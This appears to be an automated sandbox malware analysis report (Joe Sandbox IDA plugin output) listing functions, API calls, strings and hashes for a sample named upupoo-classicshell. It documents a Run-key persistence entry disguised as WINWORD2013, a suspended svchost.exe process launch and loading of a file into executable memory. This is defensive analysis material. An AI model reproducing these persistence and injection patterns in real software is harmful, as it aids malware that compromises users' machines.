                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$AddressProc$Load$Thrd_sleep
                                                                                                              • String ID: Coun$F$G$kCou$ncy$nt64$qu$t$tTic
                                                                                                              • API String ID: 1212583105-1930867906
                                                                                                              • Opcode ID: 63fd3fae5bd9e653d44420dd36731c278ce61cb73c82321da499a8b34c628357
                                                                                                              • Instruction ID: 8bf916e747627c549971069d7c37d89a57b269ec6c7abb6ecca18ec26ac9f372
                                                                                                              • Opcode Fuzzy Hash: 63fd3fae5bd9e653d44420dd36731c278ce61cb73c82321da499a8b34c628357
                                                                                                              • Instruction Fuzzy Hash: 27617B3290C7899ED321DFA88850BAFBBE8BFD9340F044E1EF58897256DB719544CB52
                                                                                                              Function 10002C90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106processCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(00000000,svchost.exe,00000000,00000000,00000000,08000004,00000000,00000000,00000044,?), ref: 10002CE6
                                                                                                              • CloseHandle.KERNEL32(?,?,?,10002ABF), ref: 10002D6E
                                                                                                              • CloseHandle.KERNEL32(?,?,10002ABF), ref: 10002D71
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                              • String ID: D$svchost.exe
                                                                                                              • API String ID: 2922976086-3151309049
                                                                                                              • Opcode ID: 20bf57721d7f56bd52dd17f86fa56a21d471b69ff6a2ea6a2db4510d28630ad0
                                                                                                              • Instruction ID: c8517a272350b0aa592396a75e8fb69f9c71425d1a18c0db54f5954cd65c6c24
                                                                                                              • Opcode Fuzzy Hash: 20bf57721d7f56bd52dd17f86fa56a21d471b69ff6a2ea6a2db4510d28630ad0
                                                                                                              • Instruction Fuzzy Hash: 4331D435E0415C9BEB10DBA4CC41BEEBBB9EF49390F11009AFA05BB285DA717E45CB90
                                                                                                              Function 6E0A7ADA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 334 6e0a7ada-6e0a7afe 335 6e0a7cbb 334->335 336 6e0a7b04-6e0a7b0b 334->336 337 6e0a7cbd-6e0a7cd3 call 6e0a8161 335->337 336->335 338 6e0a7b11-6e0a7b18 336->338 338->335 340 6e0a7b1e-6e0a7b25 338->340 340->335 342 6e0a7b2b-6e0a7b32 340->342 342->335 343 6e0a7b38-6e0a7c24 call 6e0ad10c GetModuleFileNameW 342->343 343->335 346 6e0a7c2a-6e0a7c5c PathRemoveFileSpecW call 6e0ad10c PathAppendW 343->346 346->335 349 6e0a7c5e-6e0a7c6b PathFileExistsW 346->349 350 6e0a7c6d-6e0a7c70 349->350 351 6e0a7c72-6e0a7c9c call 6e0ad10c PathAppendW 349->351 350->337 351->335 354 6e0a7c9e-6e0a7cb9 MoveFileExW 351->354 354->337
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000070,0000002E,00000061), ref: 6E0A7C1A
                                                                                                              • PathRemoveFileSpecW.SHLWAPI(?), ref: 6E0A7C32
                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 6E0A7C54
                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 6E0A7C63
                                                                                                              • PathAppendW.SHLWAPI(?,?), ref: 6E0A7C94
                                                                                                              • MoveFileExW.KERNELBASE(?,?,00000001), ref: 6E0A7CAD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePath$Append$ExistsModuleMoveNameRemoveSpec
                                                                                                              • String ID: ep.a
                                                                                                              • API String ID: 4096670196-1224730783
                                                                                                              • Opcode ID: d993c69f063474623c0636a28cd372e91c0e17715b5de65eee49d7d80b88355e
                                                                                                              • Instruction ID: 3fe620d773dcbd810c6f5253808f6a061a44b6608a579be187340d6df69b0df1
                                                                                                              • Opcode Fuzzy Hash: d993c69f063474623c0636a28cd372e91c0e17715b5de65eee49d7d80b88355e
                                                                                                              • Instruction Fuzzy Hash: E0517A71218388AAE760CBE4D859B6B73E8EFC5B04F401C1EF688C7190E7719544CBAB
                                                                                                              Function 10002C00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 46registrystringCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,0002001F,?,?,10002ACC), ref: 10002C25
                                                                                                              • lstrlenW.KERNEL32(C:\Users\Public\Documents\upupoo-classicshell.exe,?,?,10002ACC), ref: 10002C45
                                                                                                              • RegSetValueExW.KERNELBASE(?,WINWORD2013,00000000,00000001,C:\Users\Public\Documents\upupoo-classicshell.exe,00000000,?,10002ACC), ref: 10002C64
                                                                                                              • RegCloseKey.ADVAPI32(?,?,10002ACC), ref: 10002C6F
                                                                                                              Strings
                                                                                                              • WINWORD2013, xrefs: 10002C5C
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10002C1B
                                                                                                              • C:\Users\Public\Documents\upupoo-classicshell.exe, xrefs: 10002C40, 10002C53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenValuelstrlen
                                                                                                              • String ID: C:\Users\Public\Documents\upupoo-classicshell.exe$Software\Microsoft\Windows\CurrentVersion\Run$WINWORD2013
                                                                                                              • API String ID: 2964171075-666963474
                                                                                                              • Opcode ID: 0c43809fd7189bcefc8dca3fb5e0da6ec7fa81206c9ea5fc4cc5c25663f93a58
                                                                                                              • Instruction ID: 66d39b2655ccf81f02d0d063079da501b9c44719882083e2d4544529ef3bc2af
                                                                                                              • Opcode Fuzzy Hash: 0c43809fd7189bcefc8dca3fb5e0da6ec7fa81206c9ea5fc4cc5c25663f93a58
                                                                                                              • Instruction Fuzzy Hash: 2F018635B0012CBBEF10DBB49D45FAE7BA8EB08781F018169FA06EA196DF319954D790
                                                                                                              Function 6E0A7526 Relevance: 10.7, APIs: 7, Instructions: 172filememoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 362 6e0a7526-6e0a763c call 6e0a81cc CreateFileW 365 6e0a770c-6e0a770e 362->365 366 6e0a7642-6e0a764e GetFileSize 362->366 367 6e0a771c 365->367 368 6e0a7710-6e0a7713 365->368 366->365 369 6e0a7654-6e0a7671 VirtualAlloc 366->369 372 6e0a771e-6e0a7723 call 6e0a8187 367->372 368->367 370 6e0a7715-6e0a7716 CloseHandle 368->370 369->365 371 6e0a7677-6e0a7688 ReadFile 369->371 370->367 373 6e0a768a-6e0a76e0 call 6e0a7467 call 6e091000 371->373 374 6e0a7700-6e0a7707 call 6e0a73ce 371->374 373->374 382 6e0a76e2-6e0a76f0 call 6e0a73ce 373->382 374->365 382->372 385 6e0a76f2-6e0a76f5 382->385 385->372 386 6e0a76f7-6e0a76fe CloseHandle 385->386 386->372
                                                                                                              APIs
                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6E0A752D
                                                                                                              • CreateFileW.KERNELBASE(-00000017,80000000,00000001,00000000,00000003,00000080,00000000,0000007C,6E0A74CF,6E0A8143), ref: 6E0A7624
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 6E0A7644
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040), ref: 6E0A765D
                                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,00000000), ref: 6E0A76F8
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,-0000001B,00000000), ref: 6E0A7680
                                                                                                                • Part of subcall function 6E0A73CE: VirtualFree.KERNELBASE(00008000,00000000,00008000,6E0A770C), ref: 6E0A73E0
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E0A7716
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseHandleVirtual$AllocCreateFreeH_prolog3_ReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668218861-0
                                                                                                              • Opcode ID: ae59ba30428751a3a90938d2a44f563a197c2deeb565da6a69e8f53c43fbe915
                                                                                                              • Instruction ID: e7cc01f38a4b5440fd169e164ff17a37abec0dbfc398a0d5b68676d373fef05a
                                                                                                              • Opcode Fuzzy Hash: ae59ba30428751a3a90938d2a44f563a197c2deeb565da6a69e8f53c43fbe915
                                                                                                              • Instruction Fuzzy Hash: DC517C31E50348A9EB20CBE49C55BEEB774FF54B50F20550AEA14FB2E5E3B10941CB5A
                                                                                                              Function 10003E03 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 387 10003e03-10003e19 call 10004100 390 10003e25-10003e39 dllmain_raw 387->390 391 10003e1b-10003e1e 387->391 393 10003efd-10003f0b call 10004146 390->393 394 10003e3f-10003e50 dllmain_crt_dispatch 390->394 391->390 392 10003e20-10003e23 391->392 396 10003e56-10003e59 392->396 394->393 394->396 398 10003e62-10003e67 call 10001270 396->398 399 10003e5b-10003e61 call 10005e54 396->399 402 10003e6c-10003e74 398->402 399->398 404 10003ea1-10003ea3 402->404 405 10003e76-10003e78 402->405 408 10003eb0-10003eb3 404->408 409 10003ea5-10003eae call 10005ef0 404->409 406 10003e98-10003e9b 405->406 407 10003e7a-10003e93 call 10001270 dllmain_crt_dispatch dllmain_raw 405->407 406->404 411 10003e9d-10003e9f 406->411 407->406 408->393 413 10003eb5-10003ec6 dllmain_crt_dispatch 408->413 409->408 409->413 411->404 411->409 413->393 416 10003ec8-10003efa dllmain_raw 413->416 416->393
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                              • String ID:
                                                                                                              • API String ID: 1382799047-0
                                                                                                              • Opcode ID: 091da4a9f279b616c85709d655af715f6d372f82d33dfa22b276b6d253e67825
                                                                                                              • Instruction ID: 21d95cdbcc355bbce9694542adeadb8c5257880ba2f64f41f25c782f655f2304
                                                                                                              • Opcode Fuzzy Hash: 091da4a9f279b616c85709d655af715f6d372f82d33dfa22b276b6d253e67825
                                                                                                              • Instruction Fuzzy Hash: 91218376D006A6ABEB23CE64CC41D5F3BADEF45AD0B068A08FC156718EC7359C108B90
                                                                                                              Function 6E0A8889 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 418 6e0a8889-6e0a889f call 6e0a92d0 421 6e0a88ab-6e0a88bf dllmain_raw 418->421 422 6e0a88a1-6e0a88a4 418->422 424 6e0a8983-6e0a8991 call 6e0a9316 421->424 425 6e0a88c5-6e0a88d6 dllmain_crt_dispatch 421->425 422->421 423 6e0a88a6-6e0a88a9 422->423 426 6e0a88dc-6e0a88df 423->426 425->424 425->426 429 6e0a88e8-6e0a88fa call 6e0a7cd4 426->429 430 6e0a88e1-6e0a88e7 call 6e0ab1be 426->430 435 6e0a88fc-6e0a88fe 429->435 436 6e0a8927-6e0a8929 429->436 430->429 437 6e0a891e-6e0a8921 435->437 438 6e0a8900-6e0a8919 call 6e0a7cd4 dllmain_crt_dispatch dllmain_raw 435->438 439 6e0a892b-6e0a8934 call 6e0ab25a 436->439 440 6e0a8936-6e0a8939 436->440 437->436 442 6e0a8923-6e0a8925 437->442 438->437 439->440 444 6e0a893b-6e0a894c dllmain_crt_dispatch 439->444 440->424 440->444 442->436 442->439 444->424 447 6e0a894e-6e0a8980 dllmain_raw 444->447 447->424
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                              • String ID:
                                                                                                              • API String ID: 1382799047-0
                                                                                                              • Opcode ID: 3653de7113dac8de36feb4eacd6f8fac21c55bccb8f99008df797ff3e8caf61c
                                                                                                              • Instruction ID: 0f3da4d783d61ec33af2631b85bf7e63bd1acbb51ae98d3f0cbaeb28f311b044
                                                                                                              • Opcode Fuzzy Hash: 3653de7113dac8de36feb4eacd6f8fac21c55bccb8f99008df797ff3e8caf61c
                                                                                                              • Instruction Fuzzy Hash: 6B219172D0169EABCB718EED8C48B9F7A7DAE85790B090908FB2427117C73585108BB1
                                                                                                              Function 6E0ABA96 Relevance: 4.6, APIs: 3, Instructions: 58COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 465 6e0aba96-6e0aba9d call 6e0abaa4 468 6e0abaa3 465->468 469 6e0b0c15-6e0b0c1c call 6e0b3da5 465->469 468->469 472 6e0b0c1e-6e0b0c25 call 6e0b3e00 469->472 473 6e0b0c26-6e0b0c2d 469->473 472->473 475 6e0b0c2f-6e0b0c38 IsProcessorFeaturePresent 473->475 476 6e0b0c50-6e0b0c63 call 6e0b0384 473->476 477 6e0b0c3a-6e0b0c3d 475->477 478 6e0b0c3f-6e0b0c4d call 6e0b0fcb 475->478 484 6e0b0c6c-6e0b0c6e 476->484 485 6e0b0c65-6e0b0c6a 476->485 477->478 478->476 487 6e0b0c70 484->487 488 6e0b0c77-6e0b0c7a call 6e0b0dec 484->488 486 6e0b0c72 485->486 486->488 487->486 490 6e0b0c7f-6e0b0c95 call 6e0b0e49 488->490 493 6e0b0cc2-6e0b0cc5 490->493 494 6e0b0c97-6e0b0cbb call 6e0b0dec call 6e0b0e49 490->494 496 6e0b0cca-6e0b0cfd call 6e0b3078 493->496 494->493 504 6e0b0cbd-6e0b0cc1 494->504 502 6e0b0d08 496->502 503 6e0b0cff-6e0b0d02 496->503 506 6e0b0d0f-6e0b0d19 502->506 503->502 505 6e0b0d04-6e0b0d06 503->505 505->502 505->506 506->496 507 6e0b0d1b-6e0b0d1f 506->507
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,6E0B3214), ref: 6E0B0C31
                                                                                                              • _free.LIBCMT ref: 6E0B0C86
                                                                                                              • _free.LIBCMT ref: 6E0B0CAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$FeaturePresentProcessor
                                                                                                              • String ID:
                                                                                                              • API String ID: 3633555280-0
                                                                                                              • Opcode ID: ba4d2fbae15ca3ad5081e93ee30111faf82de710b4e7508837dbdb8415f4579f
                                                                                                              • Instruction ID: bf1f2c95f2896931685d454eba996553c2285935839db7fb4946895d2abca8ff
                                                                                                              • Opcode Fuzzy Hash: ba4d2fbae15ca3ad5081e93ee30111faf82de710b4e7508837dbdb8415f4579f
                                                                                                              • Instruction Fuzzy Hash: 3111F970A4C705E6FF6017E59E5EB9A369CBB01B9CF402815FA14AF5C5FBF780408A90
                                                                                                              Function 6E0B31BE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 508 6e0b31be-6e0b31ec call 6e0b2e03 511 6e0b320f call 6e0b0c15 508->511 512 6e0b31ee-6e0b31fc 508->512 515 6e0b3214-6e0b323a 511->515 516 6e0b31fe-6e0b320c call 6e0a8161 512->516
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _abort
                                                                                                              • String ID: SystemFunction036
                                                                                                              • API String ID: 1888311480-2669272182
                                                                                                              • Opcode ID: 98f11a970e4af9c1ace46dbf07b1332f937c0032c8ea7f6df47aeaec8cbc378b
                                                                                                              • Instruction ID: 58b28ffca6c2b9af528f38f07efdd722804d68c27de7745382504c47fa907a97
                                                                                                              • Opcode Fuzzy Hash: 98f11a970e4af9c1ace46dbf07b1332f937c0032c8ea7f6df47aeaec8cbc378b
                                                                                                              • Instruction Fuzzy Hash: 23F0283264010C77CB14ABF8DC5DFAE3B94FB48B20F500469FA19DB241DA779C529695
                                                                                                              Function 1000A60F Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 519 1000a60f-1000a61c call 10007e33 521 1000a621-1000a62c 519->521 522 1000a632-1000a63a 521->522 523 1000a62e-1000a630 521->523 524 1000a67a-1000a688 call 10007d68 522->524 525 1000a63c-1000a640 522->525 523->524 526 1000a642-1000a674 call 10008712 525->526 531 1000a676-1000a679 526->531 531->524
                                                                                                              APIs
                                                                                                                • Part of subcall function 10007E33: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10008366,00000001,00000364,?,100079B7,00000001,00000001), ref: 10007E74
                                                                                                              • _free.LIBCMT ref: 1000A67B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 614378929-0
                                                                                                              • Opcode ID: 051ac04c7a2a016c856e79e1e88103d593c8fffb4ef1eb67d2c95586e15a8c45
                                                                                                              • Instruction ID: b7672c1c193f76610126873ccbb3ef6330c59d536c61a41d943e1f1b5bf89c15
                                                                                                              • Opcode Fuzzy Hash: 051ac04c7a2a016c856e79e1e88103d593c8fffb4ef1eb67d2c95586e15a8c45
                                                                                                              • Instruction Fuzzy Hash: CB0126766043456BF321CE69C845A5EFBE9FB8A2B0F25061DE58483280EA30AD45C764
                                                                                                              Function 10007E33 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 532 10007e33-10007e3e 533 10007e40-10007e4a 532->533 534 10007e4c-10007e52 532->534 533->534 535 10007e80-10007e8b call 100099da 533->535 536 10007e54-10007e55 534->536 537 10007e6b-10007e7c RtlAllocateHeap 534->537 542 10007e8d-10007e8f 535->542 536->537 538 10007e57-10007e5e call 100099ed 537->538 539 10007e7e 537->539 538->535 545 10007e60-10007e69 call 10007055 538->545 539->542 545->535 545->537
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10008366,00000001,00000364,?,100079B7,00000001,00000001), ref: 10007E74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 8f0a5b2d5a03dd967ce427e314ddca8abef35719d25dea7ce93336d112499962
                                                                                                              • Instruction ID: c4940da44a0166de35659b096e3ad41ebd786e9953410b403eaffd371c36817b
                                                                                                              • Opcode Fuzzy Hash: 8f0a5b2d5a03dd967ce427e314ddca8abef35719d25dea7ce93336d112499962
                                                                                                              • Instruction Fuzzy Hash: B9F0B432E035A456FBA1DB66CC05B5B3799FB496E0B118195EC0CD719CCF28EC1186E1
                                                                                                              Function 6E0B0DEC Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 548 6e0b0dec-6e0b0df7 549 6e0b0df9-6e0b0e03 548->549 550 6e0b0e05-6e0b0e0b 548->550 549->550 551 6e0b0e39-6e0b0e44 call 6e0b1251 549->551 552 6e0b0e0d-6e0b0e0e 550->552 553 6e0b0e24-6e0b0e35 RtlAllocateHeap 550->553 558 6e0b0e46-6e0b0e48 551->558 552->553 554 6e0b0e10-6e0b0e17 call 6e0b4274 553->554 555 6e0b0e37 553->555 554->551 561 6e0b0e19-6e0b0e22 call 6e0b0b6f 554->561 555->558 561->551 561->553
                                                                                                              APIs
